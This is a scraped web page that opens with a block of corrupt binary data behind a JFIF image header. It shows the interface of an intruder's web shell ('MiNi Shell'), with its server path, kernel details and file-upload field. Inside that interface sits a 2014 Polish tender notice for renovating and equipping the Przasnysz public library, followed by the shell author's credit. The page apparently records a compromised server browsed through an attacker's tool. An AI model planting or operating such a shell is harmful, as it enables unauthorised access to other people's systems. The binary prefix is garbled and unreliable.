JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140418/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140418/133852-N-2014.html

<p class="kh_header"><b>Przasnysz: Remont pomieszczeń Miejskiej Biblioteki Publicznej w Przasnyszu wraz z wyposażeniem.</b><br>
<b>Numer ogłoszenia: 133852 - 2014; data zamieszczenia: 18.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejska Biblioteka Publiczna im. Zofii Nałkowskiej , ul. Kilińskiego 2, 06-300 Przasnysz, woj. mazowieckie, tel. 29 7564953, faks 29 7564950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mbpprzasnysz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń Miejskiej Biblioteki Publicznej w Przasnyszu wraz z wyposażeniem..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont pomieszczeń Miejskiej Biblioteki Publicznej w Przasnyszu z dostawą i montażem wyposażenia, sprzętu komputerowego wraz z oprogramowaniem oraz multimediów w ramach projektu Remont i wyposażenie biblioteki głównej MBP w Przasnyszu.
 Zamówienie zostanie udzielone w 3 częściach.
Część I Remont pomieszczeń Miejskiej Biblioteki Publicznej 
Remont obejmuje pomieszczenia czytelni, wypożyczalni, pokoju opracowania zbiorów, sali szkoleniowej, gabinetu dyrektora, dwóch wc i składa się na nie następujący zakres robót:
1)Przygotowanie ścian i sufitów do malowania  (szpachlowanie, uzupełnienie ubytków, likwidacja pęknięć, gruntowanie)
2)Dwukrotne malowanie powierzchni wewnętrznych (sufit - kolor biały; ściany - kolory pastelowe, hipoalergiczne farby zmywalne odporne na ścieranie) - 566,2 m2 
3)Remont oświetlenia w pomieszczeniu czytelni:
- ułożenie przewodów YdYp 3x1,5mm2 - 100 mb
- montaż włączników natynkowych 2 biegunowych - 5 szt.
- montaż opraw oświetleniowych zawieszanych z kloszem - 10 szt.
 UWAGA 
Kolorystyka ścian i podłóg wymaga akceptacji Zamawiającego.
Część II Dostawa i montaż wyposażenia pomieszczeń Miejskiej Biblioteki Publicznej w Przasnyszu 
Zakres oraz rodzaj urządzeń wyposażenia przewidzianych do dostawy i montażu w pomieszczeniach biblioteki wyszczególniony został  w załączniku Wykaz wyposażenia
UWAGA 1 
W załączniku graficznym - Wykaz wyposażenia przedstawiono stylizację (przykładowy wygląd urządzeń) oraz parametry w jakich należy utrzymać poszczególne elementy składające się na wyposażenie pomieszczeń. Zamawiający dopuszcza nieznaczne odchylenia w parametrach elementów wyposażenia.
Wykonawca złączy do oferty wizualizację w postaci zdjęć lub rysunków w wersji papierowej bądź elektronicznej proponowanych elementów wyposażenia zgodnie z Wykazem Wyposażenia uwzględniając powyższe uwagi Zamawiającego.

Część III Dostawa sprzętu komputerowego oraz multimediów.
Przedmiotem dostawy jest sprzęt komputerowy i prezencyjny wraz z licencjonowanym oprogramowaniem w zakresie zgodnym z załącznikiem Wykaz sprzętu komputerowego i multimediów

Wykonawca może złożyć ofertę na całe zamówienie lub na wybraną część. 

Szczegółowy opis przedmiotu zamówienia został przedstawiony w załączniku do SIWZ Wykaz wyposażenia, Wykaz sprzętu komputerowego i multimediów, przedmiarach robót oraz SST.
Realizacja zamówienia podlega prawu polskiemu, w tym w szczególności ustawie z dnia 7.7.1994 r. Prawo budowlane (tj. Dz. U. z 2010 r. Nr 245, poz. 1623 ze zm.), ustawie z dnia 29.1.2004 Prawo zamówień publicznych  t. j. DZ.U.2013 r. poz. 907 ze zm.) i ustawie  Kodeks cywilny (Dz. U. Nr 16 poz. 93 ze zm.)  oraz aktami wykonawczymi do tych ustaw. 
Wykonawca musi zapewnić wykonanie robót zgodnie z prawem polskim, a w szczególności z przepisami techniczno-budowlanymi oraz przepisami dotyczącymi wyrobów i materiałów stosowanych w budownictwie.
Podwykonawstwo :    
Zamawiający  wymaga wskazania w ofercie  części  zamówienia, których wykonanie Wykonawca powierzy podwykonawcom. Brak  takiego wskazania Zamawiający potraktuje jako deklarację wykonania całego zamówienia osobiście przez Wykonawcę.   
Jeżeli  w realizacji zamówienia będą brały udział podmioty trzecie ( podwykonawcy), na których potencjał Wykonawca powołał się w celu wykazania spełnienia warunków udziału w przetargu,  w odniesieniu do tych podmiotów  Wykonawca zobowiązany jest załączyć do oferty dokumenty potwierdzające brak podstaw do wykluczenia ich z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy pzp. 
W przypadku, gdy wykonawca powołuje się - na zasadach określonych w art. 26 ust. 2b ustawy pzp - w celu wykazania spełniania warunków udziału w postępowaniu - na zasoby innych podmiotów (podwykonawców), którzy będą realizować część zamówienia , zobowiązany jest podać w ofercie także nazwy tych podmiotów.
Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się- na zasadach określonych w art. 26 ust. 2b ustawy pzp - w celu wykazania spełniania warunków udziału w postępowaniu, wykonawca jest zobowiązany udowodnić zamawiającemu, że inny proponowany podwykonawca, lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym, niż wymagany w trakcie postępowania.
Powierzenie wykonania części zamówienia podwykonawcy (lub dalszym podwykonawcom) może nastąpić wyłącznie na podstawie Umowy Podwykonawstwa.
Przez Umowę Podwykonawstwa rozumie się umowę w formie pisemnej o charakterze odpłatnym,
której przedmiotem są usługi, dostawy lub roboty budowlane stanowiące część niniejszego zamówienia, zawartą między wybranym przez zamawiającego wykonawcą a podwykonawcą, a także między podwykonawcą a dalszym podwykonawcą/ dalszymi podwykonawcami.
Protokół odbioru zadania (końcowy) podpisany przez zamawiającego i wykonawcę jest wystarczającym dowodem potwierdzającym wykonanie usług i robót i uprawniającym podwykonawcę/ dalszego podwykonawcę do wystawienia faktury za wykonanie zleconej podwykonawcy lub dalszemu podwykonawcy roboty budowlanej, usługi lub dostawy. Umowa podwykonawstwa nie może zawierać postanowień odmiennych w zakresie zasad odbiorów niż określone w umowie podstawowej.
Pozostałe zasady w zakresie podwykonawstwa regulują postanowienia umowy zawarte w SIWZ Rozdz. IV.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przewiduje się udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 Prawa zamówień publicznych o wartość zamówień do 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.15.51.00-4, 39.15.30.00-9, 39.13.00.00-2, 39.11.30.00-7, 32.34.24.00-6, 32.00.00.00-3, 45.44.21.00-8, 45.31.00.00-3, 45.45.30.00-7, 39.22.00.00-0, 30.20.00.00-1, 30.10.00.00-0, 32.32.20.00-6, 48.00.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie jest wymagane.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Odnosi się do wszystkich części
Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie
Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy pzp                    ( Formularz nr 2)   stanowiący załącznik do  SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy pzp (Formularz nr 2) stanowiący załącznik do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   stanowiący załącznik do  SIWZ
Wykonawcy wspólnie ubiegający się o udzielenie zmówienia (konsorcjum/spółka cywilna) powyższy warunek spełniają łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   stanowiący załącznik do  SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny . 
Zamawiający dokona oceny spełnienia tego warunku w formule spełnia - nie spełnia  na podstawie oświadczenia Wykonawcy o spełnianiu warunków określonych w art. 22 ust.1 ustawy prawo zamówień publicznych ( Formularz nr 2)   stanowiący załącznik do  SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą należy złożyć: 
a)	Wizualizację w postaci zdjęć bądź rysunków w wersji papierowej bądź elektronicznej proponowanych elementów wyposażenia zgodnie z Wykazem Wyposażenia  uwzględniając uwagi Zamawiającego zawarte w pkt 3.2 niniejszej SIWZ. - odnosi się do Części II zamówienia
b)	Formularz cenowy - wyposażenie - odnosi się do Części II 
c)	Formularz cenowy - sprzęt komputerowy i multimedia - odnosi się do Części III zamówienia
d)	Pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy względnie do podpisania innych dokumentów składanych  wraz z ofertą, o ile prawo do ich podpisania nie wynika z innych dokumentów złożonych  wraz z ofertą. 
e)	Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>4.	Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy. Warunki wprowadzenia zmian są następujące: 
1)	Zmiany zakresu podwykonawstwa poprzez:
a)	Wskazanie innych podwykonawców
b)	Rezygnację podwykonawców
c)	Wskazanie innego zakresu podwykonawstwa albo wykonanie zamówienia przy pomocy podwykonawców, pomimo niewskazania w postępowaniu żadnej części zamówienia przeznaczonej do wykonania w ramach podwykonawstwa, 
2)	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby wykonawca powoływał się , na zasadach określonych w art. 26 ust. 2b, w celu wskazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 i SIWZ, wykonawca jest obowiązany wykazać zamawiającemu, iż proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenia zamówienia
3)	rozszerzenie odpowiedzialności z tytułu rękojmi oraz przedłużenie terminu rękojmi w przypadku zaproponowania takiego rozwiązania przez Wykonawcę,
4)	zmian osób reprezentujących, pod warunkiem wcześniejszego powiadomienia i akceptacji drugiej strony, w następujących przypadkach: śmierci, choroby lub innych zdarzeń losowych,
jeżeli zmiana stanie sie konieczna z jakichkolwiek innych przyczyn niezależnych od Zamawiającego lub Wykonawcy ( np. rezygnacji. itp.),
5)	zmiana danych teleadresowych stron umowy.
Powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę, jednocześnie nie stanowią one zobowiązania Zamawiającego na ich wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mbpprzasnysz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejska Biblioteka Publiczna (Pokój Opracowania Zbiorów)  
ul. Jana Kilińskiego 2, 06-300 Przasnysz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 12:00, miejsce: Miejska Biblioteka Publiczna (Pokój Opracowania Zbiorów)  
ul. Jana Kilińskiego 2, 06-300 Przasnysz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt nie jest finansowany ze środków Unii Europejskiej. Zamówienie będzie finansowane ze środków Finansowych Ministra Kultury i Dziedzictwa Narodowego pochodzących z budżetu państwa w ramach Programu Wieloletniego Kultura+ Priorytet Biblioteka+ Infrastruktura Bibliotek
Nie przewiduje się zwrotu kosztów udziału w postępowaniu z zastrzeżeniem art. 93 ust. 4...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I Remont pomieszczeń Miejskiej Biblioteki Publicznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Remont obejmuje pomieszczenia czytelni, wypożyczalni, pokoju opracowania zbiorów, sali szkoleniowej, gabinetu dyrektora, dwóch wc i składa się na nie następujący zakres robót:
1)	Przygotowanie ścian i sufitów do malowania  (szpachlowanie, uzupełnienie ubytków, likwidacja pęknięć, gruntowanie)
2)	Dwukrotne malowanie powierzchni wewnętrznych (sufit - kolor biały; ściany - kolory pastelowe, hipoalergiczne farby zmywalne odporne na ścieranie) - 566,2 m2 
3)	Remont oświetlenia w pomieszczeniu czytelni:
- ułożenie przewodów YdYp 3x1,5mm2 - 100 mb
- montaż włączników natynkowych 2 biegunowych - 5 szt.
- montaż opraw oświetleniowych zawieszanych z kloszem - 10 szt.
      UWAGA 2
Kolorystyka ścian i podłóg wymaga akceptacji Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7, 45.44.21.00-8, 45.31.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II Dostawa i montaż wyposażenia pomieszczeń Miejskiej Biblioteki Publicznej w Przasnyszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres oraz rodzaj urządzeń wyposażenia przewidzianych do dostawy i montażu w pomieszczeniach biblioteki wyszczególniony został  w załączniku Wykaz wyposażenia
UWAGA 
W załączniku graficznym - Wykaz wyposażenia przedstawiono stylizację (przykładowy wygląd urządzeń) oraz parametry w jakich należy utrzymać poszczególne elementy składające się na wyposażenie pomieszczeń. Zamawiający dopuszcza nieznaczne odchylenia w parametrach elementów wyposażenia.
Wykonawca złączy do oferty wizualizację w postaci zdjęć lub rysunków w wersji papierowej bądź elektronicznej proponowanych elementów wyposażenia zgodnie z Wykazem Wyposażenia uwzględniając powyższe uwagi Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.51.00-4, 39.15.30.00-9, 39.13.00.00-2, 39.11.30.00-7, 39.22.00.00-0, 30.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Projekt proponowanych elementów wyposażenia (Zamawiający oceni wygląd, parametry elementów wyposażenia proponowanych przez Wykonawcę - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III Dostawa sprzętu komputerowego oraz multimediów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem dostawy jest sprzęt komputerowy i prezencyjny wraz z licencjonowanym oprogramowaniem w zakresie zgodnym z załącznikiem Wykaz sprzętu komputerowego i multimediów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.15.51.00-4, 32.34.24.00-6, 32.00.00.00-3, 30.20.00.00-1, 32.32.20.00-6, 48.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com